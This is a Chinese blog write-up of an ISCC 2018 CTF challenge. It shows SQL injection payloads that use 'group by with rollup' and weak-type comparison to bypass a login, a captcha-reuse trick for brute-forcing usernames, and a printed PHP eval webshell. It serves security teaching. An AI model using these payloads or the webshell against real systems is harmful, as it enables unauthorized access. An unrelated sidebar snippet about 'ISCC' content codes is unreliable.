iscc2018攻防

最新推荐文章于 2025-05-07 20:43:59 发布
最新推荐文章于 2025-05-07 20:43:59 发布
阅读量4.8k 收藏 3
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 注入 Python学习 漏洞 html CTF学习 代码审计 CTF大本营
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/JBlock/article/details/83311753
本文借助ISCC线下攻防赛复现,介绍SQL注入绕过思路与技巧。因多数关键词被过滤,盲注不可行,可利用mysql的group by与with rollup子句绕过。还给出两种满足条件的姿势,成功注入后可得到webshell地址。强调SQL注入本质是巧妙构造利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题记

 继续未完成的使命和历程,借助iscc线下攻防赛的复现,窥探一下攻防赛的思路与技巧。

正文

首先打开界面发现一个登陆界面一个注册界面,先看一个注册界面得源码如下:

<html>
<head>
    <title>注册</title>
</head>
<body>
    <h1 style='text-align:center'>注册</h1>
    <div style="text-align:center">
        <form action="register.php" method="GET">
            用户名:iscc_<input type="text"  name="uname" placeholder="请输入四位数字" />
            <br/><br/>
            密码:<input type="password" name="pwd"/>
            <br/><br/>
            <input type="submit" value="注册">
        </form>
    </div>
</body>
</html>

看主界面发现这是个提示,也就是真正得用户名是iscc+四位数字,并且注册功能已经关闭了。我们随便输入密码,用户名登陆,并用bp抓包。

查看返回包发现一个hint.txt,这是个提示,我们找到这个文件,如下

$sql="SELECT pwd FROM user WHERE uname = '{$_POST['uname']}'";
$query = mysqli_query($con,$sql); 
if (mysqli_num_rows($query) == 1) { 
    $key = mysqli_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        echo "xxxxxxxxx";
    }else{
        echo "你这密码不太对啊";
    }
}else if(mysqli_num_rows($query) == 0){
    echo "你这密码不太对啊";
}
else{
    echo "数据太多了";
}

这应该是题目的部分源码,可以看出这里的逻辑就是,我们必须要使得提交的密码与查询出来的结果相同,但是这里的比较用的是==,也就是只需要满足弱类型比较下相等即可。

那么按照常规的思路,就是盲注注出密码,但是因为大多数关键词都被过滤了,所以盲注的思路在这里不可行。

group by与with rollup的妙用

这时要用到 mysql 中的 group bywith rollup 子句进行巧妙绕过。

group by ... with rollup 本身当然不是为了方便我们注入而设计的,这个语句在 sql 的数据统计方面有着很强大的功能,在这里简单介绍一下。

我这里用自己手里的 2004-2017 年全国 259 所高校在某地区招生数据做一下演示。

我们知道 group by 语句可以实现对查询的结果分类,比如如果我们想要统计各类高校各有多少所,可以这样:

 

mysql> select TYPE,count(NAME) from university where YEAR=2017 group by TYPE;
+--------------------------------------------------------------+-------------+
| TYPE                                                         | count(NAME) |
+--------------------------------------------------------------+-------------+
|                                                              |         135 |
| 211高校/一流大学建设高校                                        |           3 |
| 211高校/一流学科建设高校                                        |          30 |
| 211高校/一流学科建设高校/教育部直属                               |          36 |
| 211高校/双一流建设学科/教育部直属                                |           3 |
| 211高校/教育部直属                                             |           1 |
| 985高校/211高校                                               |           2 |
| 985高校/211高校/一流大学建设高校                                 |           7 |
| 985高校/211高校/一流大学建设高校/教育部直属                       |          31 |
| 985高校/211高校/教育部直属                                      |           1 |
| 一流学科建设高校                                               |           9 |
| 教育部直属                                                    |           1 |
+--------------------------------------------------------------+-------------+

 

如果我们还想在最后一行输出一下一共有多少所高校,就可以使用 with rollup子句,他将在最后添加一行数据,用来显示上面的数据的 “汇总” ,注意这个汇总并不是 求和,后面会解释。

 

mysql> select TYPE,count(NAME) from university WHERE YEAR=2017 group by TYPE WITH ROLLUP;
+--------------------------------------------------------------+-------------+
| TYPE                                                         | count(NAME) |
+--------------------------------------------------------------+-------------+
|                                                              |         135 |
| 211高校/一流大学建设高校                                        |           3 |
| 211高校/一流学科建设高校                                        |          30 |
| 211高校/一流学科建设高校/教育部直属                               |          36 |
| 211高校/双一流建设学科/教育部直属                                |           3 |
| 211高校/教育部直属                                             |           1 |
| 985高校/211高校                                               |           2 |
| 985高校/211高校/一流大学建设高校                                 |           7 |
| 985高校/211高校/一流大学建设高校/教育部直属                        |          31 |
| 985高校/211高校/教育部直属                                      |           1 |
| 一流学科建设高校                                                |           9 |
| 教育部直属                                                     |           1 |
| NULL                                                         |         259 |
+--------------------------------------------------------------+-------------+

 

大家可能发现了,在最后一行的数据中,除了数据的汇总,还有一个 NULL,这个NULL是用来表示非统计字段的。

那下面来解释一下,为什么说汇总不是 求和 ,假如我现在想查询各个类型的高校 2017 年在该地区的平均录取分数,并在最后输出所有高校的平均分:

 

mysql> select TYPE,avg(AVERAGESCORE) from university WHERE YEAR=2017 group by TYPE WITH ROLLUP;
+--------------------------------------------------------------+--------------------+
| TYPE                                                         | avg(AVERAGESCORE ) |
+--------------------------------------------------------------+--------------------+
|                                                              | 506.14814814814815 |
| 211高校/一流大学建设高校                                        |                526 |
| 211高校/一流学科建设高校                                        |  560.8333333333334 |
| 211高校/一流学科建设高校/教育部直属                               |  568.9722222222222 |
| 211高校/双一流建设学科/教育部直属                                 |  563.3333333333334 |
| 211高校/教育部直属                                             |                594 |
| 985高校/211高校                                               |              287.5 |
| 985高校/211高校/一流大学建设高校                                 |                638 |
| 985高校/211高校/一流大学建设高校/教育部直属                        |  551.3870967741935 |
| 985高校/211高校/教育部直属                                      |                  0 |
| 一流学科建设高校                                                |  437.6666666666667 |
| 教育部直属                                                     |                605 |
| NULL                                                         |  525.7837837837837 |
+--------------------------------------------------------------+--------------------+

可以看到,最后一行的结果并不是上面查询的结果的和,而是上面数据的平均值。

这样我们就可以看出,with rollup 子句,对数据进一步处理的方式,是由查询数据时,对数据处理使用的函数决定的。

如何绕过

我们继续看题目的源码,如下

$sql="SELECT pwd FROM user WHERE uname = '{$_POST['uname']}'";
$query = mysqli_query($con,$sql); 
if (mysqli_num_rows($query) == 1) { 
    $key = mysqli_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        echo "xxxxxxxxx";
    }else{
        echo "你这密码不太对啊";
    }

既然我们无法猜出密码到底是什么,那么我们可不可以控制查询的结果是我们自己已知的呢?结合上面对group by ... with rollup语句的介绍,我们可以想到,我们可以控制查询的结果为NULL,再结合 PHP 的弱类型 null=='',就可以成功绕过了。

那么我们接下来只需要构造 payload,使得查询结果为 NULL, 但是要想使用group by ... with rollup构造出NULL的一个前提条件,就是查询出的结果不为空,那么我们就需要使 uname = '{$_POST['uname']}'这个条件成立,满足这个条件了,再结合limitoffset 很容易就可以返回的结果为NULL

那么如何满足这个前提条件呢?

姿势一

结合我们已经掌握的信息,在注册页面我们已经知道账户的格式是 ISCC_+四位数字,这里其实很明显是要我们去爆破,找到这个用户名,而登录的位置存在验证码,正常来讲是不能够爆破的,但是使用 Burpsuite 简单测试一下可以发现,网站并不是在用户提交表单后、判断验证码正确性之后就直接在后端生成新的验证码返回给前端,而是在前端进行请求,进行验证码的更新。也就是说,只要我们拦截/不发送这个请求,验证码就不会更新!

那么我们就可以进行爆破了,构造好 payload:

uname=iscc_0001'group by pwd with rollup limit 1 offset 1#&pwd=&yzm=6465

然后使用 Burpsuite 爆破即可。

 

uname=iscc_7980' group by pwd with rollup limit 1 offset 1#&pwd=&yzm=6465

这个payload的回显中发现注入成功。

 

姿势二

其实我们可以更轻松地满足 uname = '{$_POST['uname']}',就是利用 SQL 的弱类型,具体情况与 php 类似,我简单举几个例子,相信大家就能明白了。

mysql> select 'aaaa' = 0;
+------------+
| 'aaaa' = 0 |
+------------+
|          1 |
+------------+
1 row in set, 1 warning (0.00 sec)
​
mysql> select 'aaaa11' = 0;
+--------------+
| 'aaaa11' = 0 |
+--------------+
|            1 |
+--------------+
1 row in set, 1 warning (0.00 sec)
​
mysql> select '20aaaa' = 20;
+---------------+
| '20aaaa' = 20 |
+---------------+
|             1 |
+---------------+
1 row in set, 1 warning (0.00 sec)

sql在一个数值和字符串进行比较的时候,会将字符串转换成数值,观察上述代码,"aaaa"=0 比较的时候,会将aaaa转化成数值,强制转化,由于aaaa是字符串,转化的结果是0自然和0相等。

"20aaaa"==20 比较的时候会将20aaaa转化成数值,结果为20,而“aaaa11“=0 却为true,也就是"aaaa11"被转化成了0。

于是我们可以构造'1'^1=1^1=0=字母开头的字符串,使条件被满足。

于是最后的payload:

uname=1'^1 group by pwd with rollup limit 1 offset 1#&pwd=

 

或者

cc'^0 group by pwd with rollup limit 1 offset 1#&pwd=

 

只要最终为true就行

拼接后的 sql 语句就是:

SELECT pwd FROM user WHERE uname = '1'^1 group by pwd with rollup limit 1 offset 1#
SELECT pwd FROM user WHERE uname = 'cc'^0 group by pwd with rollup limit 1 offset 1#

 

getflag

成功注入后,会输出一个字符串

+ADg-d+ADIAMA-d+ADUANw-e+ADI-f+ADIAYgA5AGI-e+ADUALw-f+AGIAMwAw-e+ADcAMA-f+ADcAOAAxADMANAA4ADk-dd+AGE-e+ADcAOQBi-e+ADAANwA5ADIANQBhADMANABhAC4AcABoAHA-

是 utf-7 格式编码的 webshell 地址,写个python脚本进行解码

s='+ADg-d+ADIAMA-d+ADUANw-e+ADI-f+ADIAYgA5AGI-e+ADUALw-f+AGIAMwAw-e+ADcAMA-f+ADcAOAAxADMANAA4ADk-dd+AGE-e+ADcAOQBi-e+ADAANwA5ADIANQBhADMANABhAC4AcABoAHA-'
t=s.decode('utf-7')
print t

得到webshell的地址,接下来就可以开打了

<?php 
show_source(__FILE__);
@eval($_POST['pass']);?>

Think in Think

  sql注入的本质还是通过绕过,巧妙构造来利用,这个是不会变的,而我们测试的需要注意的是耐心与条理并行!

第15届(2018)全国大学生信息安全与对抗技术竞赛(ISCC2018)通知
ISCC的博客
05-03 1万+
第15届(2018)全国大学生信息安全与对抗技术竞赛(ISCC2018)通知 1 竞赛简介 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使...
ISCC2018线下赛私地pwn
bluestar628的博客
10-24 1319
拿到题目,还是首先checksec,看开了什么保护。 开启了栈溢出检查,和栈执行保护。 首先这个题目,需要过四个phase,然后就能print_flag打印flag有点像计算机系统拆炸弹。 phase_1 第一个炸弹 要求输入一个数x,使得3*(2*x/37-18)-1=1337. 这里推荐一个z3求解器。 可以很好的解决一些求解不等式,求解方程的问题。 phase_2 要求输入一串数组...
ISCC题库.docx
05-23
ISCC2020比赛题库 ISCC ISCC ISCC ISCC
ISCC 2018(数字密文)
weixin_34237596的博客
05-25 517
做过iscc 2018之后有了很多的感触,也有更多的了解自己的不足之处,整理了一下web的wp, 为了保证各位小伙伴的阅读质量,我将会把wp以每一道题一个博文的形式写出来,希望能够帮助到你们 其中的步骤比较详细,主要是为了萌新更好的看懂每一步,希望各位能够体谅一下下!! 解题思路:刚刚看到这一题的时候,想到了键盘密码,可是不对呀! 十六进制转化为字符串...
CTF [2025 ISCC] Web题解:纸嫁衣外传(文件上传与文件包含的结合)
最新发布
chunliunaiak的博客
05-07 495
通过文件上传上传一个txt的文件,该文件包含以下的php代码<?>//这段代码本身不会执行,但是通过构造参数chuizi=uploads/1.txt 即文件所在位置,让php代码执行,通过文件包含函数,打开flag.php的内容,从而获得flag。存在一个图片在此,尝试用隐写术检查是否存在相关内容,但是以失败告终,故此尝试目录下是否存在其它的文件,在尝试过程中成功打开了/includes/flag。
ISCC2018(最新的考核解析)
落花四月
05-10 7139
最近一直在做这个 ISCC2018,感觉可能自己只是一个新手吧!但是我会继续努力的,希望我的解题思路能够给你们带来一定的想法,我也希望自己能够在安全方面遇到更多志同道合的人! 1 导入一个文本中,然后使用ASCII码表一一对比进行解密 解题思路:首先需要把附件下载下来,然后放在winhex中就会看见有ASCII码,使用ASCII码表进行转换,就会得到最终的Unicode编码,进行解密...
ISCC2018(misc)
weixin_30663391的博客
06-03 469
ISCC2018 misc writeup(部分) 这些天做个了iscc题目,有些题目不是很难,网上都有相同的题或者类似的题目,但是我很菜,没做出来多少。 #misc1:Where is the FLAG? 题目是一张图片,如下: 看这图片,flag应该是在手势指向的方向,被隐藏起来了,想到修改图片高度。之后打开图片如下: #misc2:数字密文 这里有个很...
iscc线下攻防
qq_43627239的博客
06-23 1214
比赛之前很紧张因为自己实力很差劲,比赛的时候虽然没有自己想的那么惨,因为有选择题也得到了一点分 ,但是下午的攻防赛还是很惨啊,拿到自己靶机的门槛太高了,拿不到私地flag然后也拿不到自己的靶机,攻不了也防不了,后期就看着别的队一轮一轮的刷掉我们100多分,当时的心情真的太难受了! 下午通网3个小时,在尝试拿flag的时候也搜到了很多上几次线下赛的大佬的一些经验!还有自己的一些小经验。 1.上午...
【信息安全领域】第22届ISCC信息安全与对抗技术竞赛通知:赛程安排、竞赛类别及参赛规则详细介绍了文档的核心内容
05-02
内容概要:本文档为第22届信息安全与对抗技术竞赛(ISCC 2025)的通知。ISCC自2004年创办以来,已成功举办21届,是信息安全、密码学、网络安全等领域的重要赛事。本次竞赛分为三个赛段:线上选拔赛、线下初赛和线下...
ISCC竞赛全解析:新手入门与进阶指南.pdf
05-03
内容概要:本文详细介绍了全国大学生信息安全与对抗技术竞赛(ISCC)的全貌,包括其背景、赛项设置、参赛流程以及备赛策略。ISCC由北京理工大学罗森林教授于2004年发起,旨在提升信息安全意识、普及相关知识和技术,...
CTF,ISCC各个隐写总结
08-29
在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,它涉及到各种技术挑战,包括但不限于密码学、逆向工程、网络攻防以及隐写术等。ISCC( Invisible Steganographic Communication Challenge)是其中...
iscc2018(一只猫的心思)
落花四月
05-15 2514
由于这一个杂项类没有更新,所以今天特地来写一下博文。希望能够帮助到你们!!!! 其他关于杂项类的解析,可以查看(https://blog.youkuaiyun.com/qq_41187256/article/details/80273560) 解题思路:这一题真是不要脸,一点都不要,内容那么多使用foremost命令得不到那个doc文档,我能够说什么呢?最后想到使用winhex软件还浪费了那么久的时间...
ISCC 2018——write up
weixin_34062329的博客
01-06 1156
WEB Web1-比较数字大小 直接修改input 标签里的maxlength 为999突破长度限制,使得能输入大于999 的数,然后随便输一个数字就行了 或者post修改值 Web2-Web01 strcmp 漏洞,传入为数组时会出错,导致返回为0,所以传入password[]=1,得到flag Web3-为什么这么简单啊 简单?不存在,坑你没商量。看看它说了啥吧 第二关需要...
ISCC 2018线上赛 writeup
weixin_34417635的博客
06-06 606
今天有机会去ISCC2018参加了比赛,个人的感受是比赛题目整体难度不高,就是脑洞特别大,flag形式不明确,拿到flag后也要猜测flag格式,贼坑 废话不多说,以下是本人的解题思路 MISC 0x01 What is that? 下载附件得到图片 看图应该可以猜到flag在下面被截取了,所以我们去修改图片的高度 用十六进制打开图片 在图片的高度那里修改一...
ISCC 2018 PWN WriteUp
lacoucou的专栏
05-27 2422
ISCC一上线,所有上网的人便都看着他笑,有的叫道,“ISCC,你又处新题了!”他不回答,对柜里说,“加两道web题,再来一个Reverse。”便排出九文大钱。他们又故意的高声嚷道,“你出的题又被秒了!”ISCC 睁大眼睛说,“你怎么这样凭空污人清白……”“什么清白?我前天亲眼见你PWN题目一上线,就被网友吊着打。”ISCC便涨红了脸,额上的青筋条条绽出,争辩道,“PWN题怎么秒杀……PWN!……程序猿的事,能算秒杀么?”接连便是难懂的话,什么“Double Free”,什么“Use after Free”
ISCC 2018 4.leftleftrightright 详解
qq_41071646的博客
06-03 583
哎 我这个菜虾最近才悟出来这一道题 iscc 的唯一一道windows逆向题 说实话  做出来还是挺开心的 虽然看了大佬的博客吧  其实比较崩溃的是 这个该死的upx 的壳 我还是没有手动脱出来 23333333 说实话 壳不脱也行 只要你使用OD很强  菜虾不行 只能去尽力的去脱壳 然后在论坛看见了有人说 有脱壳软件 然后抱着试一试的去拖了一下 发现 欸 可以 软件是是吾爱破解上面的工具包 可以...
ISCC
Leo8283的博客
05-02 2719
ISCC客服冲冲冲 这里肯定是写一个脚本去自动化点击左边那个按钮,我本来想不会,百度一下发现还是很简单的一串js,果然还是要去学习脚本语言 console里添加 setInterval(function(){document.getElementById("按钮id").click();},1); setInterval(function(){document.getElementById("left_button").click();},1); https://www.jb51.net/article
ISCC2023全国大学生网络信息安全竞赛
qq_57423018的博客
06-08 6380
信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。
iscc wp
wsitcj的博客
05-28 539
WEB ISCC客服冲冲冲(一) 前端控制,所以解法很多,比如用连点器,或者在 Console 里搜一下,有个 votes,直接设置,这道题可以说有非常多解题方法了,这里就不再过多阐述 这是啥 直接复制到控制台回车 得到flag Web01 打开便提示Why don’t you take a look at robots.txt? 那就访问robots.txt看看呗,发现Disallow: /src/code/code.txt 所以就访问http://39.96.91.106:7040/code/code
iscc
03-18
### ISCC (International Standard Content Code) Overview The International Standard Content Code (ISCC) is a standard designed to uniquely identify digital content objects, facilitating their management and distribution across various platforms. Unlike the **International Symposium on Computer Architecture (ISCA)**[^1], which focuses on advancements in computer architecture research, ISCC serves as an identifier system for multimedia assets such as audio, video, images, and text. #### Purpose of ISCC The primary purpose of ISCC is to provide a standardized method for generating unique identifiers that can be used to track, manage, and protect intellectual property rights associated with digital content. This ensures interoperability between different systems while maintaining consistency in metadata representation[^2]. #### Components of ISCC An ISCC code typically consists of four components: 1. **Header**: Identifies the type of media being encoded. 2. **Descriptor**: Contains descriptive information about the content. 3. **Fingerprint**: A cryptographic hash derived from the file's binary data, ensuring uniqueness even when files are altered slightly. 4. **Metadata Hash**: Represents additional attributes like authorship or licensing details. These elements work together to create comprehensive yet concise representations suitable for both human readership and machine processing purposes. #### Applications of ISCC Some common applications include copyright protection schemes where creators attach licenses directly linked via these codes; search engines utilizing them during indexing processes so users find exact matches more efficiently than traditional keyword searches alone would allow; also within blockchain technologies enabling decentralized storage solutions without losing traceability over time due to network changes etcetera. ```python import hashlib def generate_iscc_fingerprint(file_path): sha256_hash = hashlib.sha256() with open(file_path,"rb") as f: # Read and update hash string value in blocks of 4K for byte_block in iter(lambda: f.read(4096),b""): sha256_hash.update(byte_block) return sha256_hash.hexdigest() file_name = 'example.mp4' print(f"Fingerprint for {file_name}: {generate_iscc_fingerprint(file_name)}") ``` This Python snippet demonstrates how one might compute part of an ISCC fingerprint by hashing a given input file using SHA-256 algorithm—a widely accepted practice among developers implementing similar standards today.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值